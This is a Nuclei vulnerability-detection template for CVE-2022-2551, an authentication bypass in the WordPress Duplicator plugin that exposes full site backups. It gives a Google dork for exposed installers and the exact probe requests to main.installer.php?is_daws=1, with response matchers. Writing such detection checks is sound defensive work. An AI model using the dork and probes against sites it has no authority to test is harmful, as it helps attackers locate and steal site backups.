nuclei-templates/http/cves/2022/CVE-2022-2551.yaml

52 lines
1.7 KiB
YAML

id: CVE-2022-2551
info:
name: WordPress Duplicator <1.4.7 - Authentication Bypass
author: LRTK-CODER
severity: high
description: |
WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
reference:
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
- https://wordpress.org/plugins/duplicator/
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
remediation: Fixed in version 1.4.7.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-2551
cwe-id: CWE-425
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:*:*:*:*
epss-score: 0.91072
metadata:
max-request: 2
google-query: inurl:/backups-dup-lite/dup-installer/
verified: true
tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"
matchers-condition: and
matchers:
- condition: and
type: word
part: body
words:
- "<a href='../installer.php'>restart this install process</a>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by cs on 2023/04/10